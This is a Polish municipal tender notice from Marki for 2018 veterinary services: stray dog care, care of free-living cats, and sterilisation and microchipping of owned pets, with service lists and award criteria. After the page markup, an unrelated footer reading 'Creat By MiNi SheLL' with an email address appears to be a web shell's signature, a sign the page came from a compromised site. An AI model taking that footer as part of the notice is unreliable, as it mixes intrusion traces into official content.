<table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Świadczenie usług z zakresu opieki weterynaryjnej nad zwierzętami bezdomnymi z terenu Gminy Miasto Marki w 2018 roku.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>CZĘŚĆ 1Świadczenie usług z zakresu opieki weterynaryjnej nad zwierzętami bezdomnymi z terenu Gminy Miasto Marki w 2018 roku.I. Założenia ogólne1. Każde zwierzę przyjęte do zakładu leczniczego musi mieć założoną kartę zdrowia, w której odnotowane są wszystkie wykonane zabiegi, podane leki itd.,2. Na życzenie opiekuna informacje te muszą być mu udostępnione (opiekunem jest osoba fizyczna posiadająca skierowanie, o którym mowa w par. 2 pkt 5 umowy). II. Wymagania wobec zakładu leczniczegoZakład leczniczy musi:1) posiadać uprawnienia do wykonywania określonej działalności lub czynności w ramach realizacji zamówienia objętego postępowaniem,2) prowadzić działalność na terenie Gminy Miasto Marki,3) dysponować pomieszczeniem przystosowanym do okresowego przetrzymywania zwierząt chorych, oczekujących na zabiegi itd., wyposażone w boksy, klatki, klipery itp., posiadać aparaturę i sprzęt dostosowany do zakresu świadczonych usług,4) utrzymywać stały kontakt telefoniczny z Wydziałem Ochrony Środowiska i Gospodarki Wodnej (udzielać szczegółowych informacji o przyjętych i wydanych opiekunom zwierzętach).III. Wykaz przewidywanych usług weterynaryjnych świadczonych przez zakład leczniczy:1. Badanie ogólnego stanu zdrowia zwierząt - opis odzwierciedlony w indywidualnej karcie zdrowia zwierzęcia.2. Szczepienia przeciw wściekliźnie.3. Sterylizacja/ kastracja psów.4. Znakowanie psów elektroniczne (mikrochipem).5. Odrobaczanie - według zaleceń lekarsko-weterynaryjnych.6. Odpchlenie - według zaleceń lekarsko-weterynaryjnych.7. Zabiegi lecznicze wg zlecenia i zakresu uzgodnionego każdorazowo z Wydziałem Ochrony Środowiska i Gospodarki Wodnej UM Marki.8. Eutanazja - po uzgodnieniu z Wydziałem Ochrony Środowiska i Gospodarki Wodnej UM Marki - każdy przypadek musi być udokumentowany notatką sporządzoną przez lekarza weterynarii, którą należy dołączyć do miesięcznych zestawień wykonanych usług weterynaryjnych.9. Utylizacja odpadów weterynaryjnych (zakład leczniczy musi posiadać podpisaną umowę z firmą, odbierającą odpady weterynaryjne).10. Opieka weterynaryjna zwierząt bezdomnych poszkodowanych w zdarzeniach drogowych - zakład leczniczy jest zobowiązany do sporządzenia notatki zawierającej opis wydarzenia, rodzaj obrażeń zwierzęcia i zakres wykonanych zabiegów - zgodnie z wzorem stanowiącym załącznik nr 4 do umowy. Notatkę należy dołączyć do miesięcznych zestawień wykonanych usług weterynaryjnych.IV. Zalecana procedura związana ze sterylizacją/kastracją psów.1. Badanie zwierzęcia i na tej podstawie kwalifikowanie zwierząt do zabiegów.2. Zabieg sterylizacji/kastracji zabezpieczenie antybiotykowe.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>85200000-1, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2018-01-01<br/>data zakończenia: 2018-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin płatności</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Świadczenie usług z zakresu opieki weterynaryjnej nad zwierzętami wolnożyjącymi z terenu Gminy Miasto Marki - kotami w 2018 roku.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>CZĘŚĆ 2Świadczenie usług z zakresu opieki weterynaryjnej nad zwierzętami wolnożyjącymi z terenu Gminy Miasto Marki - kotami w 2018 roku.I. Założenia ogólne1. Każde zwierzę przyjęte do zakładu leczniczego musi mieć założoną kartę zdrowia, w której odnotowane są wszystkie wykonane zabiegi, podane leki itd.2. Na życzenie opiekuna informacje te muszą być mu udostępnione (opiekunem jest osoba fizyczna posiadająca skierowanie, o którym mowa w par. 1 ust. 5 umowy).II. Wymagania wobec zakładu leczniczegoZakład leczniczy musi:1) posiadać uprawnienia do wykonywania określonej działalności lub czynności w ramach realizacji zamówienia objętego postępowaniem,2) prowadzić działalność na terenie Gminy Miasto Marki,3) dysponować pomieszczeniem przystosowanym do okresowego przetrzymywania zwierząt chorych, oczekujących na zabiegi itd., wyposażone w boksy, klatki, klipery itp., posiadać aparaturę i sprzęt dostosowany do zakresu świadczonych usług, Zamawiający nie dopuszcza możliwości transportu zwierząt do innego zakładu leczniczego, zabiegi powinny być wykonywane w tym samym zakładzie leczniczym, w którym odbywać się będzie dalsza hospitalizacja zwierzęcia,4) zapewnić dom tymczasowy lub adopcję zwierząt na podstawie umowy adopcyjnej pomiędzy lecznicą lub fundacją, z którą lecznica współpracuje, a adoptującym (na koszt Zamawiającego może zostać przeprowadzona sterylizacja/kastracja zgodnie z cennikiem wynikającym z oferty),5) posiadać podpisaną umowę z firmą, odbierającą odpady weterynaryjne w tym zwłoki, lekarstwa itp.,6) utrzymywać stały kontakt telefoniczny z Wydziałem Ochrony Środowiska i Gospodarki Wodnej (udzielać szczegółowych informacji o przyjętych i wydanych opiekunom zwierzętach),7) sprawdzać, czy zwierzę nie jest oznakowane elektronicznie,8) nie powinno się socjalizować kotów dzikich. Są one leczone, a następnie wypuszczane do środowiska w miejscu znalezienia lub odłowienia. Jednakże w przypadku kotów (zwłaszcza kociąt), które z racji np. długotrwałej terapii oswoiły się, należy uzgodnić z Zamawiającym dalsze postępowanie (przekazanie do adopcji lub pod opiekę organizacji pro zwierzęcej, ewentualnie do Schroniska). Dotyczy to także kotów kalekich, które z racji odniesionych obrażeń, nie dadzą sobie rady w środowisku naturalnym,9) Wykonawca ma obowiązek przeprowadzić każdemu dostarczonemu kotu test FIV Ab/FeLV Ag służący wykrywania antygenu wirusa białaczki (FeLV) i przeciwciał wirusa niedoboru immunologicznego (FIV) kotów w surowicy, osoczu lub krwi (testy zapewnia Wykonawca). III. Wykaz przewidywanych usług weterynaryjnych świadczonych przez zakład leczniczy1. Wszystkie zwierzęta wolno żyjące dostarczone do lecznicy muszą przejść badania ogólnego stanu zdrowia.2. Badanie ogólnego stanu zdrowia obejmuje (koszt zabiegu musi uwzględniać wszystkie koszty związane z wykonaniem poniższych zabiegów): -pomiar temperatury,-osłuchanie zwierzęcia,-badanie powłok skórny, -ocena uzębienia,-określenie wieku i płci zwierzęcia,-ocena stanu gałek ocznych, jamy ustnej i uszu,-wykonanie testu w kierunku FiV i FelV, w związku z koniecznością wyeliminowania chorych zwierząt (testy zapewnia Wykonawca), -znakowanie poprzez nacięcie małżowiny usznej,-odrobaczenie (według zaleceń lekarsko-weterynaryjnych), -odpchlenie (leki według zaleceń lekarsko-weterynaryjnych), -założenie książeczki zdrowia.3. Szczepienie kociąt przeciwko wirusowym chorobom zakaźnym - koszt zabiegu musi uwzględniać wszystkie koszty związane z wykonaniem zabiegu. Nie wykonuje się żadnych szczepień u dorosłych kotów ze względu na możliwość ponownego zaszczepienia w zbyt krótkim terminie zwierzęcia które np. trafi do lecznicy po wypadku, a wcześniej było leczone i zaszczepione w innym zakładzie leczniczym. 4. Sterylizacja/kastracja kotów i pooperacyjna opieka lekarsko-weterynaryjna - koszt zabiegu musi uwzględniać wszystkie koszty związane z wykonaniem zabiegu i leczeniem zwierzęcia, w tym wszystkie niezbędne do tego celu materiały.5.1. Zabiegi operacyjno-chirurgiczne I np.: amputacja głowy kości udowej, amputacja ogona, odprowadzenie wpadniętej pochwy, odprowadzenie wpadniętej odbytnicy, usunięcie gałki ocznej, złamanie gałęzi żuchwy, złamanie kości miednicy, złamanie kości przedramienia, złamanie kości podudzia, złamanie kręgów ogonowych, złamanie kości ramiennej, złamanie kości udowej, RTG, USG, badanie krwi i moczu (wg zaleceń lekarsko-weterynaryjnych), inne leczenie (w przypadku wykrycia choroby), koszty zabiegów muszą uwzględniać wszystkie koszty związane z wykonaniem zabiegu, w tym wszystkie niezbędne do tego celu materiały.5.2. Zabiegi operacyjno-chirurgiczne II np.: amputacja palca, chirurgiczne opracowanie ran, ropomacicze, ropień gałki ocznej, ropień małżowiny usznej, wrzód rogówki, RTG, USG, badanie krwi i moczu (wg zaleceń lekarsko-weterynaryjnych), inne leczenie (w przypadku wykrycia choroby), koszty zabiegów muszą uwzględniać wszystkie koszty związane z wykonaniem zabiegu, w tym wszystkie niezbędne do tego celu materiały.6. Inne zabiegi ambulatoryjne (leczenie np.: grzybicy skóry, świerzbu, kataru kociego, usunięcie kleszcza, zapalenie spojówek, zapalenie rogówki, zapalenie naczyniówki, RTG, USG, badanie krwi i moczu (wg zaleceń lekarsko-weterynaryjnych)), koszt zabiegu musi uwzględniać wszystkie koszty związane z wykonaniem zabiegu, w tym wszystkie niezbędne do tego celu materiały.7. Pobyt zwierzęcia w lecznicy (całkowity kosz pobytu zwierzęcia w lecznicy - 1 doby, w tym między innymi karma, obroża, opieka, materiały itp. - wszystkie te elementy musi uwzględniać cena pobytu [1 doby]).8. Inne zabiegi ratujące życie wg zlecenia i zakresu uzgodnionego każdorazowo z Wydziałem Ochrony Środowiska i Gospodarki Wodnej UM Marki.9. Eutanazja (bez względu na masę ciała zwierzęcia)/uśpienie ślepego miotu (bez względu na liczebność miotu) - po uzgodnieniu z Wydziałem Ochrony Środowiska i Gospodarki Wodnej UM Marki - każdy przypadek musi być udokumentowany notatką sporządzoną przez lekarza weterynarii, którą należy dołączyć do miesięcznych zestawień wykonanych usług weterynaryjnych (koszt zabiegu musi uwzględniać wszystkie koszty związane z wykonaniem zabiegu, materiały, w tym między innymi koszt utylizacji i transportu zwłok zwierzęcych do miejsca utylizacji).10. Opieka weterynaryjna zwierząt wolnożyjących poszkodowanych w zdarzeniach drogowych - zakład leczniczy zobowiązany jest do sporządzenia notatki zawierającej opis wydarzenia, rodzaj obrażeń i zakres wykonanych zabiegów, którą należy dołączyć do faktury za wykonanie usługi.IV. Zalecana procedura związana ze sterylizacją/kastracją kotów1. Badanie zwierzęcia oraz przeprowadzenie wywiadu z opiekunem i na tej podstawie kwalifikowanie zwierząt do zabiegów.2. Zabieg sterylizacji/kastracji (u kotek preferowane jest cięcie boczne), zabezpieczenie antybiotykowe.3. Wypuszczenie kota do środowiska po 3 dniach po zabiegu (w zależności od stanu zdrowia). W przypadku sterylizacji kotki po 7 dniach. Na prośbę opiekuna koty mogą być wydane wcześniej.4. W przypadku młodych kotów nienadających się do zabiegów sterylizacji/kastracji należy je zwrócić opiekunowi/domowi tymczasowemu do czasu możliwego przeprowadzenia zabiegu.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>85200000-1, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2018-01-01<br/>data zakończenia: 2018-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin płatności</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Wykonanie zabiegów sterylizacji i kastracji kotów i psów domowych, posiadających właściciela (w tym znakowanie zwierząt) w 2018 roku.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>CZĘŚĆ 3Wykonanie zabiegów sterylizacji i kastracji kotów i psów domowych, posiadających właściciela (w tym znakowanie zwierząt) w 2018 roku.I. Założenia ogólne1. Każde zwierzę przyjęte do zakładu leczniczego musi mieć założoną kartę zdrowia, w której odnotowane są wszystkie wykonane zabiegi, podane leki itd.,2. Na życzenie opiekuna informacje te muszą być mu udostępnione (opiekunem jest osoba fizyczna posiadająca skierowanie, o którym mowa w par. 1 ust. 5 umowy). II. Wymagania wobec zakładu leczniczegoZakład leczniczy musi:1) Posiadać uprawnienia do wykonywania określonej działalności lub czynności w ramach realizacji zamówienia objętego postępowaniem,2) Utrzymywać stały kontakt telefoniczny z Wydziałem Ochrony Środowiska i Gospodarki Wodnej (udzielać szczegółowych informacji o przyjętych i wydanych opiekunom zwierzętach).3) Siedziba zakładu leczniczego musi się znajdować do 20 km od siedziby zamawiającego. III. Wykaz przewidywanych usług weterynaryjnych świadczonych przez zakład leczniczy:1. Wykonanie badania ogólnego stanu zdrowia, w tym zweryfikowanie, czy zwierzę nadaje się do wykonania planowanego zabiegu, na które udzielono skierowania. 2. Sterylizacja/kastracja psów i kotów domowych, posiadających właściciela. Przewidywana liczba zwierząt objętych zamówieniem:1) koty domowe, posiadające właściciela:-sterylizacja: 60 sztuk,-kastracja: 60 sztuk,-znakowanie: 120 sztuk,2) psy domowe, posiadające właściciela:-sterylizacja <25kg: 30 sztuk,-sterylizacja >25kg: 20 sztuk,-kastracja <25kg: 28 sztuk,	-kastracja >25 kg: 17 sztuk,-znakowanie: 95 sztuk.3. Znakowanie elektroniczne (mikrochipem) wszystkich dostarczonych na skierowanie psów i kotów domowych, posiadających właściciela.4. Zamawiający nie przewiduje możliwości pozostawiania zwierząt w lecznicy (a tym samym naliczanie dób za pobyt zwierzęcia). Zwierzęta po wykonanych zabiegach muszą zostać odebrane przez właściciela, poza sytuacjami zagrożenia życia. Te wykonawca zobowiązany jest wkalkulować w ofertę.5. Wykonanie zabiegów opisanych w ust. 3 odbywać się musi w zabezpieczeniu antybiotykowym. 6. Wykonawca ponosi pełną odpowiedzialność za zwierzęta przekazane przez właścicieli/opiekunów w celu wykonania usług, o których mowa w ust. 2. 7. Znakowanie zwierząt odbywać się musi microchipem, a dane właściciela muszą zostać przez wykonawcę umieszczone w bazie Safe-Animal. 8. Cena ofertowa wykonawcy musi uwzględniać wszelkie koszty wykonania danej usługi weterynaryjnej, materiały, pracę wykwalifikowanych osób, leki, w tym ,,nadprogramowy" pobyt zwierzęcia w lecznicy, o którym mowa w ust. 4, itp. Cena za dany zabieg jest ceną ryczałtową. 9. Zamawiający nie będzie pokrywał żadnych innych kosztów, niż te wskazane przez wykonawcę w formularzu ofertowym. <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>85200000-1, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2018-01-01<br/>data zakończenia: 2018-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin płatności</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com